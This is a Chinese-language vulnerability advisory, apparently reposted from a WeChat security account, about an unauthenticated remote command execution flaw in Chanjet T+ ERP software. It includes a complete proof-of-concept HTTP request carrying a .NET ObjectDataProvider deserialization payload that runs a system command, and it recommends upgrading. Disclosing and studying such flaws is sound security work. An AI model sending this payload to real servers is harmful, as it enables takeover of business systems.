漏洞预警 | 畅捷通T+远程命令执行漏洞

admin 2024年4月14日02:44:51评论16 views字数 1234阅读4分6秒阅读模式
0x00 漏洞编号
  • 暂无

0x01 危险等级
  • 高危

0x02 漏洞概述

畅捷通T+专属云适用于需要一体化管理的企业,财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。

漏洞预警 | 畅捷通T+远程命令执行漏洞

0x03 漏洞详情
漏洞类型:命令执行
影响:服务器权限
简述:在畅捷通T+的App_Code.ashx文件中存在远程命令执行漏洞,未授权攻击者可以利用此漏洞执行系统命令,并获取服务器权限。
0x04 影响版本
  • 畅捷通T+

0x05 POC

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: closeHost: {host}X-Ajaxpro-Method: GetStoreWarehouseByStoreContent-Type: application/x-www-form-urlencodedContent-Length: 570{  "storeID":{    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",    "MethodName":"Start",    "ObjectInstance":{      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",      "StartInfo":{        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",        "FileName":"cmd",        "Arguments":"/c whoami > success"      }    }  }}
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布不承担任何法律及连带责任。

0x06 修复建议

目前官方已发布漏洞修复版本,建议用户升级到安全版本
https://www.chanjetvip.com/product/goods/

原文始发于微信公众号(浅安安全):漏洞预警 | 畅捷通T+远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月14日02:44:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞预警 | 畅捷通T+远程命令执行漏洞https://cn-sec.com/archives/2654410.html

发表评论

匿名网友 填写信息